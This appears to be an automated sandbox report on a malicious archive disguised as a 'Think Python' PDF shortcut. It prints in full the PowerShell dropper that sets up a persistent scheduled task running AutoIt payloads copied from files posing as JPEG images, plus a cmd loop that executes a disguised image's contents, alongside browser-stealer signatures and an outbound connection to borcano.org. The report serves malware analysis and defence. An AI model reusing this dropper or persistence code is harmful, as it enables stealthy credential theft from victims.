powershell.exe -noprofile -noninteractive -ExecutionPolicy Bypass sleep 2 ; try{$Lq546qzs = New-Object -ComObject Schedule.Service ; $Plqkjsd ="(Get-CimInstance -ClassName Win32_DiskDrive).Size | Measure-Object -Sum | Select-Object -ExpandProperty Sum"; $Lq546qzs.Connect() ; $MASK = $Lq546qzs.NewTask(0) ; $reginfo = $MASK.RegistrationInfo ;$reginfo.Description = '' ; $reginfo.Author = '' ; $iosdfiu5s = $MASK.Principal; $iosdfiu5s.LogonType = 3 ; $esf5s = $MASK.settings ; $esf5s.Enabled = $true ; $esf5s.StartWhenAvailable = $true ; $esf5s.Hidden = $false ; $esf5s.DisallowStartIfOnBatteries = $false ; $esf5s.StopIfGoingOnBatteries = $false ; $esf5s.MultipleInstances = 2 ; $esf5s.ExecutionTimeLimit = """PT0H""" ; $sqdf = $MASK.Triggers.Create(9); $sqdf.Enabled = $true; $sqdf.Id = """LogonTriggerId"""; $sqdf.Repetition.Interval = """PT5M"""; $sqdf.Repetition.StopAtDurationEnd = $false; $activationTime = (Get-Date).AddMinutes(3); $sqdf.StartBoundary = $activationTime.ToString('yyyy-MM-ddTHH:mm:ss'); $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $sqdf.UserId = $currentUser.Name; $poqsdjkpoqj5qs5=$MASK.Triggers.Create(2) ; $poqsdjkpoqj5qs5.Enabled=$true ; $poqsdjkpoqj5qs5.Repetition.Interval="""PT10M""" ;$poqsdjkpoqj5qs5.Repetition.StopAtDurationEnd=$false ; $poqsdjkpoqj5qs5.Id="""DailyTriggerId""" ; $poqsdjkpoqj5qs5.StartBoundary = (Get-Date).AddMinutes(1).tostring('yyyy-MM-ddTHH:mm:ss'); $action_ = $MASK.Actions.Create(0) ; $action_.Path = '"""%appdata%\Microsoft\Windows\AutoIt3.exe"""' ; $action_.Arguments = '/ErrorStdOut """%appdata%\Microsoft\Windows\' + $Plqkjsd + '.au3""""'; $Lq546qzs.GetFolder("""\\""").RegisterTaskDefinition("""$Plqkjsd""", $MASK, 6 , $null, $null, 3) ;$Pllds = \"$env:APPDATA\Microsoft\Windows\"; Copy-Item MyCover2.jpeg \"$Pllds\$Plqkjsd.au3\"; Copy-Item MyCover3.jpeg \"$Pllds\AutoIt3.exe\" } Catch [System.Exception]{};"

C:\Windows\system32\attrib.exe

attrib -h -s /s /d

Network

N/A

Files

memory/2668-40-0x0000000002A50000-0x0000000002AD0000-memory.dmp

memory/2668-41-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2668-42-0x00000000027A0000-0x00000000027A8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

150s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %i in ('dir /b MyCover4.jpg') do @for /f "delims=" %j in (%i) do @%j

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir /b MyCover4.jpg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -noninteractive -ExecutionPolicy Bypass sleep 2 ; try{$Lq546qzs = New-Object -ComObject Schedule.Service ; $Plqkjsd ="(Get-CimInstance -ClassName Win32_DiskDrive).Size | Measure-Object -Sum | Select-Object -ExpandProperty Sum"; $Lq546qzs.Connect() ; $MASK = $Lq546qzs.NewTask(0) ; $reginfo = $MASK.RegistrationInfo ;$reginfo.Description = '' ; $reginfo.Author = '' ; $iosdfiu5s = $MASK.Principal; $iosdfiu5s.LogonType = 3 ; $esf5s = $MASK.settings ; $esf5s.Enabled = $true ; $esf5s.StartWhenAvailable = $true ; $esf5s.Hidden = $false ; $esf5s.DisallowStartIfOnBatteries = $false ; $esf5s.StopIfGoingOnBatteries = $false ; $esf5s.MultipleInstances = 2 ; $esf5s.ExecutionTimeLimit = """PT0H""" ; $sqdf = $MASK.Triggers.Create(9); $sqdf.Enabled = $true; $sqdf.Id = """LogonTriggerId"""; $sqdf.Repetition.Interval = """PT5M"""; $sqdf.Repetition.StopAtDurationEnd = $false; $activationTime = (Get-Date).AddMinutes(3); $sqdf.StartBoundary = $activationTime.ToString('yyyy-MM-ddTHH:mm:ss'); $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $sqdf.UserId = $currentUser.Name; $poqsdjkpoqj5qs5=$MASK.Triggers.Create(2) ; $poqsdjkpoqj5qs5.Enabled=$true ; $poqsdjkpoqj5qs5.Repetition.Interval="""PT10M""" ;$poqsdjkpoqj5qs5.Repetition.StopAtDurationEnd=$false ; $poqsdjkpoqj5qs5.Id="""DailyTriggerId""" ; $poqsdjkpoqj5qs5.StartBoundary = (Get-Date).AddMinutes(1).tostring('yyyy-MM-ddTHH:mm:ss'); $action_ = $MASK.Actions.Create(0) ; $action_.Path = '"""%appdata%\Microsoft\Windows\AutoIt3.exe"""' ; $action_.Arguments = '/ErrorStdOut """%appdata%\Microsoft\Windows\' + $Plqkjsd + '.au3""""'; $Lq546qzs.GetFolder("""\\""").RegisterTaskDefinition("""$Plqkjsd""", $MASK, 6 , $null, $null, 3) ;$Pllds = \"$env:APPDATA\Microsoft\Windows\"; Copy-Item MyCover2.jpeg \"$Pllds\$Plqkjsd.au3\"; Copy-Item MyCover3.jpeg \"$Pllds\AutoIt3.exe\" } Catch [System.Exception]{};"

C:\Windows\system32\attrib.exe

attrib -h -s /s /d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe /ErrorStdOut "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\274872407040.au3"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 borcano.org udp
US 104.21.3.11:443 borcano.org tcp
US 8.8.8.8:53 11.3.21.104.in-addr.arpa udp

Files

memory/3632-0-0x00007FFB82C43000-0x00007FFB82C45000-memory.dmp

memory/3632-2-0x0000018D154D0000-0x0000018D154F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ght3kyqm.1y5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe

MD5 0adb9b817f1df7807576c2d7068dd931
SHA1 4a1b94a9a5113106f40cd8ea724703734d15f118
SHA256 98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b
SHA512 883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\274872407040.au3

MD5 fa26096b95742e002aaa28f5add10d15
SHA1 27411586e4b2082750df480d9725c535f86b8f4c
SHA256 dce814637339057cd26d594d6b1dafad71f805d596f4c0dd3d6707136a7e4eaf
SHA512 2699af7e5435fc7b8e4b774690592f499f43a5420a005c2379ee343e038d4a5b723f0912ea1e3c03c1670ef01582ff90198010adfcf0cb263ee3115c1c75f57f

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

152s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover4.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover4.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

memory/4348-0-0x00007FFA4CFB3000-0x00007FFA4CFB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4mbk0p1.1wr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240508-en

Max time kernel

122s

Max time network

123s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover4.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover4.ps1

Network

N/A

Files

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover4.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover4.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/3116-0-0x00007FFB795C3000-0x00007FFB795C5000-memory.dmp

memory/3116-2-0x000001BF604F0000-0x000001BF60512000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eq0tw4oi.lr5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
